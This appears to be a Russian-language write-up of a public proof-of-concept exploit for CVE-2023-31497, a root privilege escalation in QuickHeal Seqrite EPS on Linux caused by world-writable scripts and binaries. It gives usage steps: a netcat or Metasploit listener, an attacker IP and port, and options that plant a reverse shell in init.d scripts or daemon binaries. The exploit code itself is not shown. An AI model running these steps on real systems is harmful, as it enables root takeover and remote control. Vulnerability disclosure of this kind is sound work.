
Эксплойт для уязвимости повышения привилегий в QuickHeal Seqrite EPS (CVE-2023-31497).
Уязвимость повышения привилегий в решении Seqrite Enterprise Endpoint Security (EPS) от QuickHeal. Уязвимости присвоен идентификатор CVE-2023-31497.
Seqrite Endpoint Security при установке по умолчанию размещается в каталоге /usr/lib/Seqrite/ с очень слабыми правами доступа к каталогам и файлам, предоставляя локальному пользователю полные права на чтение и запись содержимого каталога. Кроме того, процедура установки размещает скрипты запуска в /etc/init.d/, которые доступны для записи всем пользователям. Это позволяет любому непривилегированному пользователю системы повысить привилегии до root.
Эксплойт использует две различные уязвимости, вносимые программным обеспечением, для повышения привилегий в системе. Во-первых, приложение использует скрипты в /etc/init.d/ для запуска процессов сканирования, которые могут быть изменены любым пользователем. Во-вторых, приложение использует разделяемые объекты для динамической загрузки позиционно-независимого кода (PIC) во время выполнения. Фактически все исполняемые файлы разделяемых объектов доступны для записи всем пользователям. Наконец, двоичные файлы приложения, используемые для демона, также доступны для записи всем пользователям, что означает, что любой непривилегированный пользователь может перезаписать двоичные файлы сканера двоичным файлом обратной оболочки для выполнения произвольного кода от имени root.
Эксплойт представляет собой простой файл Python, который помогает эксплуатировать уязвимость.
Шаги:
nc -lvp <port>) или metasploit (multi/handler).epscalate.py и shellcode.c на целевую систему.python3 epscalate.py -H 192.168.0.103:9999 -I).Справка эксплойта:
$ python epscalate.py -h
EPSCALATE - PoC for privesc in Seqrite EPS
~ 0xInfection
usage: epscalate.py -H <host>:<port> <technique_flag>
options:
-h, --help show this help message and exit
-H HOSTPORT, --hostport HOSTPORT
The IP and port of the listening attacker machine in format of <ip>:<port>
-B, --daemon-binaries
Overwrite the main daemon binaries to escalate privileges.
-I, --initd-scripts Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.
Эксплойт протестирован на всех вариантах операционных систем на базе Debian и Ubuntu.
Код эксплойта опубликован под лицензией Apache 2.0. Уязвимость была раскрыта поставщику и устранена на момент публикации.
Автор уязвимости и эксплойта: Пинаки Мондал (0xInfection).